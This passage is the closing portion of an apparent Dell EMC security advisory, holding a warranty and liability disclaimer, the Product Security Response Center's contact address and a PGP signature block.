a particular purpose, title and non-infringement. In no event, shall Dell EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Dell EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. Dell EMC Product Security Response Center security_alert@emc.com -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org iQEcBAEBCgAGBQJagPFFAAoJEHbcu+fsE81ZivMH/0s0r4XFxvW9tL+l8zkGdJIc uRjYTAr5iE4I8PaLw0S/MYVIr2YbpBcaP5QuUbNENWr/aaPHtccE3Gou6Bv72FK0 CU2qMdV9kjWbhHvbIjrnS2RsNjTekWSIDjYJPdkHk03thutYa3Loy7bX42LJe6E7 +slgZjR5zkATMvGis2R/nEj40phxxA+I/dUJIMjbT7emBCSBL5IAlvmuznzChm31 hklk6F/YDI/iOC8GBo0PwNf2F6PBUJbR78B6ppLeHP8AygLdu/AZZX/5eHyDGBiS 8eHATltqjU5I8X7fnjKl8UtoL1ohw72tMROiN9164N2xoJQwasMX6Rs3eNpru2c= =HaYf -----END PGP SIGNATURE-----